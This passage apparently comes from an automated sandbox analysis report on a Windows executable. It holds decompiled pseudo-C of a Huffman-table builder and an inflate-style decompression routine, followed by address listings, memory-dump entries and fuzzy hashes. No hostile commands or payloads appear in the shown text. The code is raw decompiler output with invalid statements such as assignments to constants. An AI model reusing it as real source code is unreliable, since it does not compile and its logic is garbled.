                                                                                        											__eflags = __edx - __eax;
                                                                                        											 *(__ebp - 0x30) = __edx;
                                                                                        											if(__edx >= __eax) {
                                                                                        												__ecx = __ecx - __edx;
                                                                                        												__eflags = __ecx;
                                                                                        												__eax = __ecx;
                                                                                        											} else {
                                                                                        												__eax = __eax - __edx;
                                                                                        												__eax = __eax - 1;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L48;
                                                                                        											} else {
                                                                                        												goto L38;
                                                                                        											}
                                                                                        										case 0xb:
                                                                                        											goto L56;
                                                                                        										case 0xc:
                                                                                        											L60:
                                                                                        											__esi[1] = __esi[1] >> 0xa;
                                                                                        											__eax = (__esi[1] >> 0xa) + 4;
                                                                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                        												goto L68;
                                                                                        											}
                                                                                        											goto L61;
                                                                                        										case 0xd:
                                                                                        											while(1) {
                                                                                        												L93:
                                                                                        												__eax = __esi[1];
                                                                                        												__ecx = __esi[2];
                                                                                        												__edx = __eax;
                                                                                        												__eax = __eax & 0x0000001f;
                                                                                        												__edx = __edx >> 5;
                                                                                        												__eax = __edx + __eax + 0x102;
                                                                                        												__eflags = __esi[2] - __eax;
                                                                                        												if(__esi[2] >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L73:
                                                                                        												__eax = __esi[0x143];
                                                                                        												while(1) {
                                                                                        													L76:
                                                                                        													__eflags = __ebx - __eax;
                                                                                        													if(__ebx >= __eax) {
                                                                                        														break;
                                                                                        													}
                                                                                        													L74:
                                                                                        													__eflags =  *(__ebp - 0x34);
                                                                                        													if( *(__ebp - 0x34) == 0) {
                                                                                        														goto L159;
                                                                                        													}
                                                                                        													L75:
                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        													__ecx = __ebx;
                                                                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        													__ebx = __ebx + 8;
                                                                                        													__eflags = __ebx;
                                                                                        												}
                                                                                        												L77:
                                                                                        												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                        												__eax = __eax &  *(__ebp - 0x40);
                                                                                        												__ecx = __esi[0x144];
                                                                                        												__eax = __esi[0x144] + __eax * 4;
                                                                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                        												__eflags = __eax - 0x10;
                                                                                        												 *(__ebp - 0x14) = __eax;
                                                                                        												if(__eax >= 0x10) {
                                                                                        													L79:
                                                                                        													__eflags = __eax - 0x12;
                                                                                        													if(__eax != 0x12) {
                                                                                        														__eax = __eax + 0xfffffff2;
                                                                                        														 *(__ebp - 8) = 3;
                                                                                        													} else {
                                                                                        														_push(7);
                                                                                        														 *(__ebp - 8) = 0xb;
                                                                                        														_pop(__eax);
                                                                                        													}
                                                                                        													while(1) {
                                                                                        														L84:
                                                                                        														__ecx = __eax + __edx;
                                                                                        														__eflags = __ebx - __eax + __edx;
                                                                                        														if(__ebx >= __eax + __edx) {
                                                                                        															break;
                                                                                        														}
                                                                                        														L82:
                                                                                        														__eflags =  *(__ebp - 0x34);
                                                                                        														if( *(__ebp - 0x34) == 0) {
                                                                                        															goto L159;
                                                                                        														}
                                                                                        														L83:
                                                                                        														__ecx =  *(__ebp - 0x38);
                                                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        														__ecx = __ebx;
                                                                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        														__ebx = __ebx + 8;
                                                                                        														__eflags = __ebx;
                                                                                        													}
                                                                                        													L85:
                                                                                        													__ecx = __edx;
                                                                                        													__ebx = __ebx - __edx;
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        													__ebx = __ebx - __eax;
                                                                                        													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        													__ecx = __eax;
                                                                                        													__eax = __esi[1];
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        													__ecx = __esi[2];
                                                                                        													__eax = __eax >> 5;
                                                                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                        													__eax = __eax & 0x0000001f;
                                                                                        													__eax = __edi + __eax + 0x102;
                                                                                        													__edi = __edx + __ecx;
                                                                                        													__eflags = __edx + __ecx - __eax;
                                                                                        													if(__edx + __ecx > __eax) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L86:
                                                                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                        													if( *(__ebp - 0x14) != 0x10) {
                                                                                        														L89:
                                                                                        														__edi = 0;
                                                                                        														__eflags = 0;
                                                                                        														L90:
                                                                                        														__eax = __esi + 0xc + __ecx * 4;
                                                                                        														do {
                                                                                        															L91:
                                                                                        															 *__eax = __edi;
                                                                                        															__ecx = __ecx + 1;
                                                                                        															__eax = __eax + 4;
                                                                                        															__edx = __edx - 1;
                                                                                        															__eflags = __edx;
                                                                                        														} while (__edx != 0);
                                                                                        														__esi[2] = __ecx;
                                                                                        														continue;
                                                                                        													}
                                                                                        													L87:
                                                                                        													__eflags = __ecx - 1;
                                                                                        													if(__ecx < 1) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L88:
                                                                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                        													goto L90;
                                                                                        												}
                                                                                        												L78:
                                                                                        												__ecx = __edx;
                                                                                        												__ebx = __ebx - __edx;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        												__ecx = __esi[2];
                                                                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                        												__esi[2] = __esi[2] + 1;
                                                                                        											}
                                                                                        											L94:
                                                                                        											__eax = __esi[1];
                                                                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                        											__edi = __eax;
                                                                                        											__eax = __eax >> 5;
                                                                                        											__edi = __edi & 0x0000001f;
                                                                                        											__ecx = 0x101;
                                                                                        											__eax = __eax & 0x0000001f;
                                                                                        											__edi = __edi + 0x101;
                                                                                        											__eax = __eax + 1;
                                                                                        											__edx = __ebp - 0xc;
                                                                                        											 *(__ebp - 0x14) = __eax;
                                                                                        											 &(__esi[0x148]) = __ebp - 4;
                                                                                        											 *(__ebp - 4) = 9;
                                                                                        											__ebp - 0x18 =  &(__esi[3]);
                                                                                        											 *(__ebp - 0x10) = 6;
                                                                                        											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                        											__eflags =  *(__ebp - 4);
                                                                                        											if( *(__ebp - 4) == 0) {
                                                                                        												__eax = __eax | 0xffffffff;
                                                                                        												__eflags = __eax;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L9;
                                                                                        											} else {
                                                                                        												L97:
                                                                                        												__ebp - 0xc =  &(__esi[0x148]);
                                                                                        												__ebp - 0x10 = __ebp - 0x1c;
                                                                                        												__eax = __esi + 0xc + __edi * 4;
                                                                                        												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												L98:
                                                                                        												__eax =  *(__ebp - 0x10);
                                                                                        												__eflags =  *(__ebp - 0x10);
                                                                                        												if( *(__ebp - 0x10) != 0) {
                                                                                        													L100:
                                                                                        													__cl =  *(__ebp - 4);
                                                                                        													 *__esi =  *__esi & 0x00000000;
                                                                                        													__eflags =  *__esi;
                                                                                        													__esi[4] = __al;
                                                                                        													__eax =  *(__ebp - 0x18);
                                                                                        													__esi[5] =  *(__ebp - 0x18);
                                                                                        													__eax =  *(__ebp - 0x1c);
                                                                                        													__esi[4] = __cl;
                                                                                        													__esi[6] =  *(__ebp - 0x1c);
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L99:
                                                                                        												__eflags = __edi - 0x101;
                                                                                        												if(__edi > 0x101) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												goto L100;
                                                                                        											}
                                                                                        										case 0xe:
                                                                                        											goto L9;
                                                                                        										case 0xf:
                                                                                        											L152:
                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                        											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                        											__ecx = __esi[0x26ea];
                                                                                        											__edx = __esi[0x26e9];
                                                                                        											__eflags = __ecx - __edx;
                                                                                        											 *(__ebp - 0x30) = __ecx;
                                                                                        											if(__ecx >= __edx) {
                                                                                        												__eax = __esi[0x26e8];
                                                                                        												__eax = __esi[0x26e8] - __ecx;
                                                                                        												__eflags = __eax;
                                                                                        											} else {
                                                                                        												__edx = __edx - __ecx;
                                                                                        												__eax = __edx - __ecx - 1;
                                                                                        											}
                                                                                        											__eflags = __ecx - __edx;
                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                        											if(__ecx != __edx) {
                                                                                        												L160:
                                                                                        												__edi = 0;
                                                                                        												goto L10;
                                                                                        											} else {
                                                                                        												L156:
                                                                                        												__eax = __esi[0x145];
                                                                                        												__eflags = __eax - 8;
                                                                                        												 *__esi = __eax;
                                                                                        												if(__eax != 8) {
                                                                                        													L161:
                                                                                        													0 = 1;
                                                                                        													goto L10;
                                                                                        												}
                                                                                        												goto L157;
                                                                                        											}
                                                                                        									}
                                                                                        								}
                                                                                        								L158:
                                                                                        								goto L9;
                                                                                        							}
                                                                                        							L70:
                                                                                        							if( *__edi == __eax) {
                                                                                        								goto L72;
                                                                                        							}
                                                                                        							L71:
                                                                                        							__esi[2] = __esi[2] & __eax;
                                                                                        							 *__esi = 0xd;
                                                                                        							goto L93;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L159:
                                                                                        				_t414 = 0;
                                                                                        				_t417[0x147] =  *(_t419 - 0x40);
                                                                                        				_t417[0x146] = _t396;
                                                                                        				( *(_t419 + 8))[1] = 0;
                                                                                        				goto L11;
                                                                                        			}









                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f2d
                                                                                        0x00406f2d
                                                                                        0x00406f30
                                                                                        0x00406f37
                                                                                        0x00000000
                                                                                        0x00406f37
                                                                                        0x00406f0c
                                                                                        0x00406f0f
                                                                                        0x00406f16
                                                                                        0x00406f19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f3f
                                                                                        0x00406f3f
                                                                                        0x00406f64
                                                                                        0x00406f64
                                                                                        0x00406f64
                                                                                        0x00406f66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f44
                                                                                        0x00406f44
                                                                                        0x00406f48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f4e
                                                                                        0x00406f4e
                                                                                        0x00406f51
                                                                                        0x00406f54
                                                                                        0x00406f57
                                                                                        0x00406f59
                                                                                        0x00406f5b
                                                                                        0x00406f5e
                                                                                        0x00406f61
                                                                                        0x00406f61
                                                                                        0x00406f61
                                                                                        0x00406f68
                                                                                        0x00406f70
                                                                                        0x00406f73
                                                                                        0x00406f76
                                                                                        0x00406f78
                                                                                        0x00406f7b
                                                                                        0x00406f7d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f83
                                                                                        0x00406f83
                                                                                        0x00406f86
                                                                                        0x00406f87
                                                                                        0x00406f88
                                                                                        0x00406f8a
                                                                                        0x00406f8e
                                                                                        0x00000000
                                                                                        0x00407089
                                                                                        0x00407089
                                                                                        0x0040708c
                                                                                        0x0040708f
                                                                                        0x00407091
                                                                                        0x00407128
                                                                                        0x00407128
                                                                                        0x0040712b
                                                                                        0x0040712d
                                                                                        0x0040712e
                                                                                        0x0040712f
                                                                                        0x00407132
                                                                                        0x00000000
                                                                                        0x00407132
                                                                                        0x00407097
                                                                                        0x00407097
                                                                                        0x0040709d
                                                                                        0x0040709f
                                                                                        0x004070c4
                                                                                        0x004070c7
                                                                                        0x004070cd
                                                                                        0x004070d2
                                                                                        0x004070d8
                                                                                        0x004070de
                                                                                        0x004070e0
                                                                                        0x004070e3
                                                                                        0x004070ec
                                                                                        0x004070f2
                                                                                        0x004070f2
                                                                                        0x004070e5
                                                                                        0x004070e7
                                                                                        0x004070e9
                                                                                        0x004070e9
                                                                                        0x004070f4
                                                                                        0x004070fa
                                                                                        0x004070fc
                                                                                        0x004070ff
                                                                                        0x00407101
                                                                                        0x00407107
                                                                                        0x00407109
                                                                                        0x0040710b
                                                                                        0x0040710d
                                                                                        0x0040710f
                                                                                        0x00407112
                                                                                        0x0040711b
                                                                                        0x0040711e
                                                                                        0x0040711e
                                                                                        0x00407114
                                                                                        0x00407114
                                                                                        0x00407117
                                                                                        0x00407117
                                                                                        0x00407112
                                                                                        0x00407109
                                                                                        0x00407120
                                                                                        0x00407122
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407122
                                                                                        0x004070a1
                                                                                        0x004070a1
                                                                                        0x004070a7
                                                                                        0x004070ad
                                                                                        0x004070af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004070b1
                                                                                        0x004070b1
                                                                                        0x004070b3
                                                                                        0x004070b5
                                                                                        0x004070bc
                                                                                        0x004070bc
                                                                                        0x004070be
                                                                                        0x004070b7
                                                                                        0x004070b7
                                                                                        0x004070b9
                                                                                        0x004070b9
                                                                                        0x004070c0
                                                                                        0x004070c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040713a
                                                                                        0x0040713a
                                                                                        0x0040713d
                                                                                        0x0040713f
                                                                                        0x00407142
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067f3
                                                                                        0x004067d7
                                                                                        0x00000000
                                                                                        0x004067dd
                                                                                        0x004067e0
                                                                                        0x004067ea
                                                                                        0x004067ed
                                                                                        0x004067f0
                                                                                        0x00000000
                                                                                        0x004067f0
                                                                                        0x004067d7
                                                                                        0x004067fb
                                                                                        0x004067fe
                                                                                        0x00406802
                                                                                        0x0040680c
                                                                                        0x00406816
                                                                                        0x00406819
                                                                                        0x0040681f
                                                                                        0x00406953
                                                                                        0x00406955
                                                                                        0x0040695b
                                                                                        0x0040695e
                                                                                        0x00406961
                                                                                        0x00000000
                                                                                        0x00406961
                                                                                        0x00406825
                                                                                        0x00406825
                                                                                        0x00406826
                                                                                        0x0040687e
                                                                                        0x0040687e
                                                                                        0x00406885
                                                                                        0x0040692b
                                                                                        0x0040692b
                                                                                        0x00406930
                                                                                        0x00406933
                                                                                        0x00406938
                                                                                        0x0040693b
                                                                                        0x00406940
                                                                                        0x00406943
                                                                                        0x00406948
                                                                                        0x0040694b
                                                                                        0x0040694b
                                                                                        0x00000000
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688f
                                                                                        0x00406894
                                                                                        0x00406894
                                                                                        0x00406894
                                                                                        0x00406899
                                                                                        0x0040689b
                                                                                        0x0040689d
                                                                                        0x004068a2
                                                                                        0x004068a8
                                                                                        0x004068ad
                                                                                        0x004068af
                                                                                        0x004068af
                                                                                        0x004068a4
                                                                                        0x004068a4
                                                                                        0x004068a4
                                                                                        0x004068a2
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b6
                                                                                        0x004068b9
                                                                                        0x004068b9
                                                                                        0x004068ed
                                                                                        0x004068f2
                                                                                        0x004068f4
                                                                                        0x004068f5
                                                                                        0x004068f7
                                                                                        0x004068f8
                                                                                        0x004068f8
                                                                                        0x004068f8
                                                                                        0x00406920
                                                                                        0x00406925
                                                                                        0x00406925
                                                                                        0x00000000
                                                                                        0x00406925
                                                                                        0x00406885
                                                                                        0x00406828
                                                                                        0x00406828
                                                                                        0x00406829
                                                                                        0x00406873
                                                                                        0x00000000
                                                                                        0x00406873
                                                                                        0x0040682b
                                                                                        0x0040682c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406988
                                                                                        0x00406988
                                                                                        0x00406988
                                                                                        0x0040698b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406968
                                                                                        0x00406968
                                                                                        0x0040696c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406972
                                                                                        0x00406972
                                                                                        0x00406975
                                                                                        0x00406978
                                                                                        0x0040697d
                                                                                        0x0040697f
                                                                                        0x00406982
                                                                                        0x00406985
                                                                                        0x00406985
                                                                                        0x00406985
                                                                                        0x0040698d
                                                                                        0x0040698d
                                                                                        0x00406990
                                                                                        0x00406992
                                                                                        0x00406997
                                                                                        0x0040699a
                                                                                        0x0040699c
                                                                                        0x0040699f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004069a5
                                                                                        0x004069a5
                                                                                        0x004069a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406abb
                                                                                        0x0040719f
                                                                                        0x004071a2
                                                                                        0x004071a4
                                                                                        0x004071ad
                                                                                        0x004071b3
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                        • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                        • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                        • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                        				signed int _v8;
                                                                                        				unsigned int _v12;
                                                                                        				signed int _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				intOrPtr* _v32;
                                                                                        				signed int* _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				void _v116;
                                                                                        				signed int _v176;
                                                                                        				signed int _v180;
                                                                                        				signed int _v240;
                                                                                        				signed int _t166;
                                                                                        				signed int _t168;
                                                                                        				intOrPtr _t175;
                                                                                        				signed int _t181;
                                                                                        				void* _t182;
                                                                                        				intOrPtr _t183;
                                                                                        				signed int* _t184;
                                                                                        				signed int _t186;
                                                                                        				signed int _t187;
                                                                                        				signed int* _t189;
                                                                                        				signed int _t190;
                                                                                        				intOrPtr* _t191;
                                                                                        				intOrPtr _t192;
                                                                                        				signed int _t193;
                                                                                        				signed int _t195;
                                                                                        				signed int _t200;
                                                                                        				signed int _t205;
                                                                                        				void* _t207;
                                                                                        				short _t208;
                                                                                        				signed char _t222;
                                                                                        				signed int _t224;
                                                                                        				signed int _t225;
                                                                                        				signed int* _t232;
                                                                                        				signed int _t233;
                                                                                        				signed int _t234;
                                                                                        				void* _t235;
                                                                                        				signed int _t236;
                                                                                        				signed int _t244;
                                                                                        				signed int _t246;
                                                                                        				signed int _t251;
                                                                                        				signed int _t254;
                                                                                        				signed int _t256;
                                                                                        				signed int _t259;
                                                                                        				signed int _t262;
                                                                                        				void* _t263;
                                                                                        				void* _t264;
                                                                                        				signed int _t267;
                                                                                        				intOrPtr _t269;
                                                                                        				intOrPtr _t271;
                                                                                        				signed int _t274;
                                                                                        				intOrPtr* _t275;
                                                                                        				unsigned int _t276;
                                                                                        				void* _t277;
                                                                                        				signed int _t278;
                                                                                        				intOrPtr* _t279;
                                                                                        				signed int _t281;
                                                                                        				intOrPtr _t282;
                                                                                        				intOrPtr _t283;
                                                                                        				signed int* _t284;
                                                                                        				signed int _t286;
                                                                                        				signed int _t287;
                                                                                        				signed int _t288;
                                                                                        				signed int _t296;
                                                                                        				signed int* _t297;
                                                                                        				intOrPtr _t298;
                                                                                        				void* _t299;
                                                                                        
                                                                                        				_t278 = _a8;
                                                                                        				_t187 = 0x10;
                                                                                        				memset( &_v116, 0, _t187 << 2);
                                                                                        				_t189 = _a4;
                                                                                        				_t233 = _t278;
                                                                                        				do {
                                                                                        					_t166 =  *_t189;
                                                                                        					_t189 =  &(_t189[1]);
                                                                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                        					_t233 = _t233 - 1;
                                                                                        				} while (_t233 != 0);
                                                                                        				if(_v116 != _t278) {
                                                                                        					_t279 = _a28;
                                                                                        					_t267 =  *_t279;
                                                                                        					_t190 = 1;
                                                                                        					_a28 = _t267;
                                                                                        					_t234 = 0xf;
                                                                                        					while(1) {
                                                                                        						_t168 = 0;
                                                                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t190 = _t190 + 1;
                                                                                        						if(_t190 <= _t234) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v8 = _t190;
                                                                                        					if(_t267 < _t190) {
                                                                                        						_a28 = _t190;
                                                                                        					}
                                                                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                        						_t234 = _t234 - 1;
                                                                                        						if(_t234 != 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v28 = _t234;
                                                                                        					if(_a28 > _t234) {
                                                                                        						_a28 = _t234;
                                                                                        					}
                                                                                        					 *_t279 = _a28;
                                                                                        					_t181 = 1 << _t190;
                                                                                        					while(_t190 < _t234) {
                                                                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                        						if(_t182 < 0) {
                                                                                        							L64:
                                                                                        							return _t168 | 0xffffffff;
                                                                                        						}
                                                                                        						_t190 = _t190 + 1;
                                                                                        						_t181 = _t182 + _t182;
                                                                                        					}
                                                                                        					_t281 = _t234 << 2;
                                                                                        					_t191 = _t299 + _t281 - 0x70;
                                                                                        					_t269 =  *_t191;
                                                                                        					_t183 = _t181 - _t269;
                                                                                        					_v52 = _t183;
                                                                                        					if(_t183 < 0) {
                                                                                        						goto L64;
                                                                                        					}
                                                                                        					_v176 = _t168;
                                                                                        					 *_t191 = _t269 + _t183;
                                                                                        					_t192 = 0;
                                                                                        					_t235 = _t234 - 1;
                                                                                        					if(_t235 == 0) {
                                                                                        						L21:
                                                                                        						_t184 = _a4;
                                                                                        						_t271 = 0;
                                                                                        						do {
                                                                                        							_t193 =  *_t184;
                                                                                        							_t184 =  &(_t184[1]);
                                                                                        							if(_t193 != _t168) {
                                                                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                        								_t236 =  *_t232;
                                                                                        								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
                                                                                        								 *_t232 = _t236 + 1;
                                                                                        							}
                                                                                        							_t271 = _t271 + 1;
                                                                                        						} while (_t271 < _a8);
                                                                                        						_v16 = _v16 | 0xffffffff;
                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                        						_t195 = _v8;
                                                                                        						_t186 =  ~_a28;
                                                                                        						_v12 = _t168;
                                                                                        						_v180 = _t168;
                                                                                        						_v36 = 0x42d6d0;
                                                                                        						_v240 = _t168;
                                                                                        						if(_t195 > _v28) {
                                                                                        							L62:
                                                                                        							_t168 = 0;
                                                                                        							if(_v52 == 0 || _v28 == 1) {
                                                                                        								return _t168;
                                                                                        							} else {
                                                                                        								goto L64;
                                                                                        							}
                                                                                        						}
                                                                                        						_v44 = _t195 - 1;
                                                                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                        						do {
                                                                                        							_t282 =  *_v32;
                                                                                        							if(_t282 == 0) {
                                                                                        								goto L61;
                                                                                        							}
                                                                                        							while(1) {
                                                                                        								_t283 = _t282 - 1;
                                                                                        								_t200 = _a28 + _t186;
                                                                                        								_v48 = _t283;
                                                                                        								_v24 = _t200;
                                                                                        								if(_v8 <= _t200) {
                                                                                        									goto L45;
                                                                                        								}
                                                                                        								L31:
                                                                                        								_v20 = _t283 + 1;
                                                                                        								do {
                                                                                        									_v16 = _v16 + 1;
                                                                                        									_t296 = _v28 - _v24;
                                                                                        									if(_t296 > _a28) {
                                                                                        										_t296 = _a28;
                                                                                        									}
                                                                                        									_t222 = _v8 - _v24;
                                                                                        									_t254 = 1 << _t222;
                                                                                        									if(1 <= _v20) {
                                                                                        										L40:
                                                                                        										_t256 =  *_a36;
                                                                                        										_t168 = 1 << _t222;
                                                                                        										_v40 = 1;
                                                                                        										_t274 = _t256 + 1;
                                                                                        										if(_t274 > 0x5a0) {
                                                                                        											goto L64;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t275 = _v32;
                                                                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                        										if(_t222 >= _t296) {
                                                                                        											goto L40;
                                                                                        										}
                                                                                        										while(1) {
                                                                                        											_t222 = _t222 + 1;
                                                                                        											if(_t222 >= _t296) {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        											_t275 = _t275 + 4;
                                                                                        											_t264 = _t263 + _t263;
                                                                                        											_t175 =  *_t275;
                                                                                        											if(_t264 <= _t175) {
                                                                                        												goto L40;
                                                                                        											}
                                                                                        											_t263 = _t264 - _t175;
                                                                                        										}
                                                                                        										goto L40;
                                                                                        									}
                                                                                        									_t168 = _a32 + _t256 * 4;
                                                                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                        									 *_a36 = _t274;
                                                                                        									_t259 = _v16;
                                                                                        									 *_t297 = _t168;
                                                                                        									if(_t259 == 0) {
                                                                                        										 *_a24 = _t168;
                                                                                        									} else {
                                                                                        										_t276 = _v12;
                                                                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                        										_a5 = _a28;
                                                                                        										_a4 = _t222;
                                                                                        										_t262 = _t276 >> _t186;
                                                                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                        										 *(_t298 + _t262 * 4) = _a4;
                                                                                        									}
                                                                                        									_t224 = _v24;
                                                                                        									_t186 = _t224;
                                                                                        									_t225 = _t224 + _a28;
                                                                                        									_v24 = _t225;
                                                                                        								} while (_v8 > _t225);
                                                                                        								L45:
                                                                                        								_t284 = _v36;
                                                                                        								_a5 = _v8 - _t186;
                                                                                        								if(_t284 < 0x42d6d0 + _a8 * 4) {
                                                                                        									_t205 =  *_t284;
                                                                                        									if(_t205 >= _a12) {
                                                                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                        										_v36 =  &(_v36[1]);
                                                                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                        									} else {
                                                                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                        										_t208 =  *_t284;
